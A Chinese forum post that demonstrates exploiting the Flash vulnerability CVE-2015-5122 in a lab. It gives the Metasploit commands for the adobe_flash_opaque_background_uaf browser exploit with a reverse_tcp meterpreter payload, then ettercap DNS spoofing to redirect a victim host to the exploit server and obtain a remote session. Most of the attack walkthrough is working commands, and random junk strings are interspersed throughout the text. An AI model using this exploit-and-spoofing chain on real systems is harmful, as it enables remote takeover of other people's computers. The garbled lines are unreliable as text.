cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

( M& F; n, p6 v+ s 二、cve2015-5122漏洞实例演示虚拟机 ) x5 M& I) ?( n f3 z: H' O& c

9 K' M7 q$ g. S) Z) A 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： ' }* l6 u" q8 w$ M

& N" H4 A( g4 u/ A: E search cve-2015-5122如图： D s% m m: t4 H( j

4 {4 R* W0 r5 G% o; W/ E" ~ % z5 C6 r' h# }, ^1 S

) [5 A1 [0 t( y7 ]6 _ 下面我们敲如下命令： + l, \' ^/ i( x1 A9 I* {

& Y7 L7 r5 D! C) g use exploit/multi/browser/adobe_flash_opaque_background_uaf 1 R' n7 ]; Q% d5 A; q }1 w# \

* `1 H$ G* ]' }, p set PAYLOAD windows/meterpreter/reverse_tcp & R! v5 | N3 }) w8 q7 \

1 q5 ^* y; Y0 S5 E! z3 t set LHOST 192.168.0.109 & Y5 f4 w0 Y/ A9 R

, h2 D4 q2 B: d! L2 H set URIPATH / /*根目录*/ 6 T" I) Q4 C" S9 Q

) y' @. K% P7 A" v4 H% z5 s4 S set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 & w# ^; s3 c( n9 H/ F6 Q4 P

5 l1 Q5 q$ |5 b8 @5 f6 b set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 4 ^- U* D& m. I

" b& x" M8 p/ X, ^& d- g 然后show options如图： , o+ N b" U/ O( z0 o! u

' d, J, D6 O. ?2 B. b - V0 F: ^0 t- |9 ?! m. L( v

3 B0 ^: P6 i) H" t0 |& a6 J1 ] 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
' {" J* Y1 O+ _' t) a2 n & A& R& w! l6 |8 R# v: k

6 K/ K) |, j1 g" g2 V2 c# h2 p 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 ) _$ p5 r6 l6 {( ]$ B, J. t

3 t/ g5 x+ j; X Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 9 m( n, A8 R& X: i- V

( {3 F2 b& E' Y ; K- n) P9 O _" A. I

" w% t+ I+ W1 K3 E4 H' ^ 成功了，这时候我们断开ettercap，如图： 0 B2 t0 w3 E' c- H6 Y

& G4 v, q0 K u+ A 9 W* n$ ?6 Y7 `% {9 M! d4 k

- a* D% O8 A, X+ n Screenshot如图： - F# J8 q7 u+ n% _3 ~! v

* \$ `2 }$ X5 I. L7 g: u% ~2 G $ ~! ^: `5 E' S0 a

# U! V0 r9 Q' W) ~) M . f o1 @1 ^) C3 x

		自动登录	找回密码
密码			立即注册